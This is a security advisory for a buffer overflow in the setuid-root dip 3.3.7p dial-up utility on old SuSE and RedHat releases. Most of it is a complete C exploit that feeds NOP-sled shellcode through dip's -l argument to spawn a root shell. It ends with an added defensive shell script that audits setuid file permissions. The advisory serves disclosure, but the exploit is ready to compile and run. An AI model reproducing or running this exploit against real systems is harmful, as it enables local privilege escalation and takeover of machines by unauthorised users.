Vulnerability: dip

Affected: dip 3.3.7p

Description:

'sebi hegi' found the following. After doing a check on his SuSE Linux 7.0 x86 box he found something interesting:

hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

Looks like this version is still vulnerable although the issue went public in 1998. It is not world executable, but it is still a security risk on SuSE 7.0. And we are wondering why at least SuSE still ships a product with a known vulnerability.

/* Linux x86 dip 3.3.7p exploit by pr10n */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90

/* thanks to hack.co.za */
char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
    "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
    "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

/* current stack pointer, used as the base for the return address guess */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    char buf[136];
    int i;
    int offset = 0;
    long ret;

    if (argc != 2) {
        printf("usage: %s offset\n", argv[0]);
        exit(0);
    }
    offset = atoi(argv[1]);
    ret = (get_sp() - offset);

    /* fill the buffer with the guessed return address */
    for (i = 1; i < 136; i += 4) {
        *(long *)&buf[i] = ret;
    }
    printf("\nusing: 0x%lx\n\n", ret);

    /* NOP sled followed by the shellcode */
    for (i = 0; i < (sizeof(buf) - strlen(shellcode) - 40); i++)
        buf[i] = NOP;
    memcpy(buf + i, shellcode, strlen(shellcode));

    /* the oversized buffer is passed as dip's -l argument */
    execl("/usr/sbin/dip", "dip", "-k", "-l", buf, (char *)0);
}

The same package and problem is present on SuSE 7.1 and RedHat 6.2. SuSE 6.2 and 6.3 are also vulnerable and setuid root. But normal users, just like on SuSE 7.0, don't have execute permissions on these versions.

Solution:

Nothing yet.
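The permission reasoning in the advisory (setuid root, owner root, group dialout, no world execute bit) as an added shell check; this is not part of the original advisory. It parses one `ls -l` line, such as the `/usr/sbin/dip` line quoted above, and reports whose privileges the binary gains and which user classes can actually execute it. It assumes the usual `ls -l` field layout (mode, links, owner, group, size, three date fields, path).

```shell
#!/bin/sh
# Added example, not from the advisory: classify a single `ls -l` line the way
# the advisory reasons about /usr/sbin/dip -- which account the binary runs as
# (setuid/setgid bits) and which user classes hold an execute bit on it.
# Assumes the usual `ls -l` layout: mode links owner group size date(3 fields) path.

classify_setuid_line() {
    set -- $1                        # split the ls line into fields
    mode=$1; owner=$3; group=$4
    shift 8; path=$*                 # everything after the date is the path

    u=$(printf '%s' "$mode" | cut -c4)    # owner execute slot: x, s, S or -
    g=$(printf '%s' "$mode" | cut -c7)    # group execute slot: x, s, S or -
    o=$(printf '%s' "$mode" | cut -c10)   # other execute slot: x, t, T or -

    priv=""                          # whose privileges the program gains
    case $u in s|S) priv="setuid:$owner";; esac
    case $g in s|S) priv="${priv:+$priv,}setgid:$group";; esac

    who=""                           # which classes can execute the file
    case $u in x|s) who="owner";; esac
    case $g in x|s) who="${who:+$who,}group=$group";; esac
    case $o in x|t) who="${who:+$who,}other";; esac

    printf '%s %s exec:%s\n' "$path" "${priv:-none}" "${who:-nobody}"
}

# Constructed input: the exact line quoted in the advisory. A setuid-root file
# that only root and the dialout group can run is a narrower exposure than a
# world-executable copy, but still a privilege boundary worth tracking.
classify_setuid_line "-rwsr-xr-- 1 root dialout 62056 Jul 29 2000 /usr/sbin/dip"
```

Feeding it the output of `find / -perm -4000 -exec ls -l {} +` gives the same classification for every setuid file on a host.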